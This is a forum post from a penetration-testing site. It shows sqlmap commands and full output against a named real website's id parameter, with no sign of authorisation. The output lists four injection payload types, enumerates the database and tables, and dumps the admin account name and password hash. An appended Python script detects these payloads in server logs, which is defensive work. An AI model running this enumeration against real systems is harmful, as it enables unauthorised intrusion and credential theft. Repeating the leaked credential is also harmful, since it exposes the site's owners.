China Network Penetration Testing Alliance

Title: sqlmap MySQL injection example

Author: admin    Time: 2013-4-4 22:18
Title: sqlmap MySQL injection example
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"         /* list the tables in the current database */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0     /* get the column names of the admin table */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns */

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
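Each sqlmap run above reports the same four payload families in the `id` parameter (boolean-based, error-based, UNION and time-based), and every one of them leaves a recognisable trace in the web server's access log. The following detector, added here as an example and not part of the original post or of sqlmap, scans Apache combined-format log lines for those families and decodes the `CHAR(...)` calls so the `:cvx:` / `:ncv:` marker strings sqlmap wraps around extracted data become visible; the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One regex per payload family sqlmap reported above, most specific first so an
# error-based payload (which also contains "AND") is not labelled boolean-based.
SIGNATURES = [
    ("error-based", re.compile(r"FLOOR\(RAND\(0\)\*2\)|information_schema\.tables\s+GROUP\s+BY", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s+\d+=\d+\b", re.I)),
]
CHAR_CALL = re.compile(r"CHAR\(([\d,\s]+)\)", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_char_calls(sql):
    """Replace MySQL CHAR(n,n,...) calls with the literal they build, which exposes
    the :cvx: / :ncv: markers sqlmap wraps around data it extracts."""
    return CHAR_CALL.sub(
        lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'", sql)

def classify_request(log_line):
    """Return (parameter, technique, decoded payload) for the first injected query
    parameter in an Apache combined-format log line, or None for a clean request."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    # parse_qs undoes the percent-encoding the scanner applied to its payload.
    for param, values in parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True).items():
        for value in values:
            for technique, pattern in SIGNATURES:
                if pattern.search(value):
                    return (param, technique, decode_char_calls(value))
    return None

def summarise(log_lines):
    """Count hits per technique: several families from one client inside a few
    seconds is the footprint of an automated scanner, not a stray probe."""
    counts = {}
    for hit in filter(None, map(classify_request, log_lines)):
        counts[hit[1]] = counts.get(hit[1], 0) + 1
    return counts

# Constructed sample log lines (not taken from the post) mirroring the payloads above.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 312',
    '10.0.0.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(CHAR(58,99,118,120,58),CHAR(58,110,99,118,58))%23 HTTP/1.1" 200 5301',
    '10.0.0.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
]
```

Calling `summarise(SAMPLE_LOG)` returns one hit per family; in a real log the same `id` parameter hit by all four families from one client within seconds is the signature of the enumeration sequence shown above, and the root cause to fix is the unparameterised `id` in article.php.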




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2